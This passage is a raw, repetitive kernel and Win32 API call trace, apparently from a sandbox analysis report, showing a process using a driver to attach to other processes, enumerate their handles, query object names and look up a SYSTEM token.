PsReleaseProcessExitSynchronization () returned 0x2 [0264.857] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd1b [0264.858] ObQueryNameString (in: Object=0xffffe00069b7bd80, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.858] ObfDereferenceObject (Object=0xffffe00069b7bd80) returned 0x800f [0264.858] IoCompleteRequest () returned 0x0 [0264.858] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.858] PsAcquireProcessExitSynchronization () returned 0x0 [0264.858] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.858] ObReferenceObjectByHandle (in: Handle=0xaf8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b4edb0, HandleInformation=0x0) returned 0x0 [0264.858] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.858] PsReleaseProcessExitSynchronization () returned 0x2 [0264.858] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd1a [0264.858] ObQueryNameString (in: Object=0xffffe00069b4edb0, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.858] ObfDereferenceObject (Object=0xffffe00069b4edb0) returned 0x7fff [0264.858] IoCompleteRequest () returned 0x0 [0264.858] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.858] PsAcquireProcessExitSynchronization () returned 0x0 [0264.858] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.858] ObReferenceObjectByHandle (in: Handle=0xb14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069e21330, HandleInformation=0x0) returned 0x0 [0264.858] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.858] PsReleaseProcessExitSynchronization () returned 0x2 [0264.858] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd19 [0264.858] ObQueryNameString (in: Object=0xffffe00069e21330, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.858] ObfDereferenceObject (Object=0xffffe00069e21330) returned 0x7ff5 [0264.858] IoCompleteRequest () returned 0x0 [0264.858] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.858] PsAcquireProcessExitSynchronization () returned 0x0 [0264.858] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.858] ObReferenceObjectByHandle (in: Handle=0xc08, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069a8fc40, HandleInformation=0x0) returned 0x0 [0264.858] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.858] PsReleaseProcessExitSynchronization () returned 0x2 [0264.858] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd18 [0264.858] ObQueryNameString (in: Object=0xffffe00069a8fc40, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.858] ObfDereferenceObject (Object=0xffffe00069a8fc40) returned 0x7ffd [0264.858] IoCompleteRequest () returned 0x0 [0264.858] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.858] PsAcquireProcessExitSynchronization () returned 0x0 [0264.858] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.858] ObReferenceObjectByHandle (in: Handle=0xc14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069bd1d10, HandleInformation=0x0) returned 0x0 [0264.858] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.858] PsReleaseProcessExitSynchronization () returned 0x2 [0264.858] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd17 [0264.858] ObQueryNameString (in: Object=0xffffe00069bd1d10, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.858] ObfDereferenceObject (Object=0xffffe00069bd1d10) returned 0x7ff5 [0264.859] IoCompleteRequest () returned 0x0 [0264.859] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.859] PsAcquireProcessExitSynchronization () returned 0x0 [0264.859] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.859] ObReferenceObjectByHandle (in: Handle=0xc18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a344bf0, HandleInformation=0x0) returned 0x0 [0264.859] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.859] PsReleaseProcessExitSynchronization () returned 0x2 [0264.859] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd16 [0264.859] ObQueryNameString (in: Object=0xffffe0006a344bf0, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.859] ObfDereferenceObject (Object=0xffffe0006a344bf0) returned 0x7ffe [0264.859] IoCompleteRequest () returned 0x0 [0264.859] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.859] PsAcquireProcessExitSynchronization () returned 0x0 [0264.859] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.859] ObReferenceObjectByHandle (in: Handle=0xc1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a343a60, HandleInformation=0x0) returned 0x0 [0264.859] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.859] PsReleaseProcessExitSynchronization () returned 0x2 [0264.859] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd15 [0264.859] ObQueryNameString (in: Object=0xffffe0006a343a60, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.859] ObfDereferenceObject (Object=0xffffe0006a343a60) returned 0x7ffe [0264.859] IoCompleteRequest () returned 0x0 [0264.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0x180 [0264.859] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0264.859] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe000696a6840, HandleInformation=0x0) returned 0x0 [0264.859] ObOpenObjectByPointer (in: Object=0xffffe000696a6840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.859] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x801a4 [0264.859] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe0006a921e00 | out: TokenHandle=0xffffe0006a921e00*=0x1a8) returned 0x0 [0264.859] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.859] IoCompleteRequest () returned 0x0 [0264.859] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.859] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.860] CloseHandle (hObject=0x1a8) returned 1 [0264.860] CloseHandle (hObject=0x180) returned 1 [0264.860] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.860] PsAcquireProcessExitSynchronization () returned 0x0 [0264.860] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.860] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000696a5480, HandleInformation=0x0) returned 0x0 [0264.860] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.860] PsReleaseProcessExitSynchronization () returned 0x2 [0264.861] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x781a2 [0264.861] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.861] ObfDereferenceObject (Object=0xffffe000696a5480) returned 0x7ffe [0264.861] IoCompleteRequest () returned 0x0 [0264.861] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.861] PsAcquireProcessExitSynchronization () returned 0x0 [0264.861] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.861] ObReferenceObjectByHandle (in: Handle=0xbc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697ac830, HandleInformation=0x0) returned 0x0 [0264.861] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.861] PsReleaseProcessExitSynchronization () returned 0x2 [0264.861] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x781a1 [0264.861] ObQueryNameString (in: Object=0xffffe000697ac830, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.861] ObfDereferenceObject (Object=0xffffe000697ac830) returned 0x7f5a [0264.861] IoCompleteRequest () returned 0x0 [0264.861] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.861] PsAcquireProcessExitSynchronization () returned 0x0 [0264.861] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.861] ObReferenceObjectByHandle (in: Handle=0x130, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697b4f20, HandleInformation=0x0) returned 0x0 [0264.861] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.861] PsReleaseProcessExitSynchronization () returned 0x2 [0264.861] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x781a0 [0264.861] ObQueryNameString (in: Object=0xffffe000697b4f20, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.861] ObfDereferenceObject (Object=0xffffe000697b4f20) returned 0x7fff [0264.861] IoCompleteRequest () returned 0x0 [0264.861] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.861] PsAcquireProcessExitSynchronization () returned 0x0 [0264.861] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.861] ObReferenceObjectByHandle (in: Handle=0x140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697b1950, HandleInformation=0x0) returned 0x0 [0264.861] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.861] PsReleaseProcessExitSynchronization () returned 0x2 [0264.861] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7819f [0264.861] ObQueryNameString (in: Object=0xffffe000697b1950, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.861] ObfDereferenceObject (Object=0xffffe000697b1950) returned 0x7fff [0264.861] IoCompleteRequest () returned 0x0 [0264.861] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.861] PsAcquireProcessExitSynchronization () returned 0x0 [0264.861] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.861] ObReferenceObjectByHandle (in: Handle=0x148, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697b31f0, HandleInformation=0x0) returned 0x0 [0264.861] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.861] PsReleaseProcessExitSynchronization () returned 0x2 [0264.861] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7819e [0264.861] ObQueryNameString (in: Object=0xffffe000697b31f0, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.861] ObfDereferenceObject (Object=0xffffe000697b31f0) returned 0x7ffd [0264.861] IoCompleteRequest () returned 0x0 [0264.862] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.862] PsAcquireProcessExitSynchronization () returned 0x0 [0264.862] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.862] ObReferenceObjectByHandle (in: Handle=0x154, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697b4580, HandleInformation=0x0) returned 0x0 [0264.862] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.862] PsReleaseProcessExitSynchronization () returned 0x2 [0264.862] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7819d [0264.862] ObQueryNameString (in: Object=0xffffe000697b4580, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.862] ObfDereferenceObject (Object=0xffffe000697b4580) returned 0x7fff [0264.862] IoCompleteRequest () returned 0x0 [0264.862] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.862] PsAcquireProcessExitSynchronization () returned 0x0 [0264.862] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.862] ObReferenceObjectByHandle (in: Handle=0x1c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.862] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.862] PsReleaseProcessExitSynchronization () returned 0x2 [0264.862] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7819c [0264.862] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.862] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x190000 [0264.862] IoCompleteRequest () returned 0x0 [0264.862] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.862] PsAcquireProcessExitSynchronization () returned 0x0 [0264.862] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.862] ObReferenceObjectByHandle (in: Handle=0x2a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697df250, HandleInformation=0x0) returned 0x0 [0264.862] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.862] PsReleaseProcessExitSynchronization () returned 0x2 [0264.862] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7819b [0264.862] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.862] ObfDereferenceObject (Object=0xffffe000697df250) returned 0x7ffe [0264.862] IoCompleteRequest () returned 0x0 [0264.862] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.862] PsAcquireProcessExitSynchronization () returned 0x0 [0264.862] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.862] ObReferenceObjectByHandle (in: Handle=0x314, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697e4f20, HandleInformation=0x0) returned 0x0 [0264.862] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.862] PsReleaseProcessExitSynchronization () returned 0x2 [0264.862] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7819a [0264.862] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.862] ObfDereferenceObject (Object=0xffffe000697e4f20) returned 0x7ffc [0264.862] IoCompleteRequest () returned 0x0 [0264.862] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.862] PsAcquireProcessExitSynchronization () returned 0x0 [0264.862] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.862] ObReferenceObjectByHandle (in: Handle=0x3a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001484bf7d0, HandleInformation=0x0) returned 0x0 [0264.862] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.863] PsReleaseProcessExitSynchronization () returned 0x2 [0264.863] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78199 [0264.863] ObQueryNameString (in: Object=0xffffc001484bf7d0, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.863] ObfDereferenceObject (Object=0xffffc001484bf7d0) returned 0x18000 [0264.863] IoCompleteRequest () returned 0x0 [0264.863] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.863] PsAcquireProcessExitSynchronization () returned 0x0 [0264.863] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.863] ObReferenceObjectByHandle (in: Handle=0x3a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148526460, HandleInformation=0x0) returned 0x0 [0264.863] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.863] PsReleaseProcessExitSynchronization () returned 0x2 [0264.863] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78198 [0264.863] ObQueryNameString (in: Object=0xffffc00148526460, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.863] ObfDereferenceObject (Object=0xffffc00148526460) returned 0x8000 [0264.863] IoCompleteRequest () returned 0x0 [0264.863] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.863] PsAcquireProcessExitSynchronization () returned 0x0 [0264.863] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.863] ObReferenceObjectByHandle (in: Handle=0x45c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697e9530, HandleInformation=0x0) returned 0x0 [0264.863] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.863] PsReleaseProcessExitSynchronization () returned 0x2 [0264.863] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78197 [0264.863] ObQueryNameString (in: Object=0xffffe000697e9530, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.863] ObfDereferenceObject (Object=0xffffe000697e9530) returned 0x7ffe [0264.863] IoCompleteRequest () returned 0x0 [0264.863] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.863] PsAcquireProcessExitSynchronization () returned 0x0 [0264.863] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.863] ObReferenceObjectByHandle (in: Handle=0x460, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697e96a0, HandleInformation=0x0) returned 0x0 [0264.863] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.863] PsReleaseProcessExitSynchronization () returned 0x2 [0264.863] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78196 [0264.863] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a3b07c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3b07c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.863] ObfDereferenceObject (Object=0xffffe000697e96a0) returned 0x8000 [0264.863] IoCompleteRequest () returned 0x0 [0264.863] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.863] PsAcquireProcessExitSynchronization () returned 0x0 [0264.863] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.863] ObReferenceObjectByHandle (in: Handle=0x464, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697e93c0, HandleInformation=0x0) returned 0x0 [0264.863] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.863] PsReleaseProcessExitSynchronization () returned 0x2 [0264.863] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78195 [0264.863] ObQueryNameString (in: Object=0xffffe000697e93c0, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.864] ObfDereferenceObject (Object=0xffffe000697e93c0) returned 0x7ffe [0264.864] IoCompleteRequest () returned 0x0 [0264.864] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.864] PsAcquireProcessExitSynchronization () returned 0x0 [0264.864] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.864] ObReferenceObjectByHandle (in: Handle=0x558, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069843980, HandleInformation=0x0) returned 0x0 [0264.864] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.864] PsReleaseProcessExitSynchronization () returned 0x2 [0264.864] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78194 [0264.864] ObQueryNameString (in: Object=0xffffe00069843980, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.864] ObfDereferenceObject (Object=0xffffe00069843980) returned 0x7fff [0264.864] IoCompleteRequest () returned 0x0 [0264.864] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.864] PsAcquireProcessExitSynchronization () returned 0x0 [0264.864] 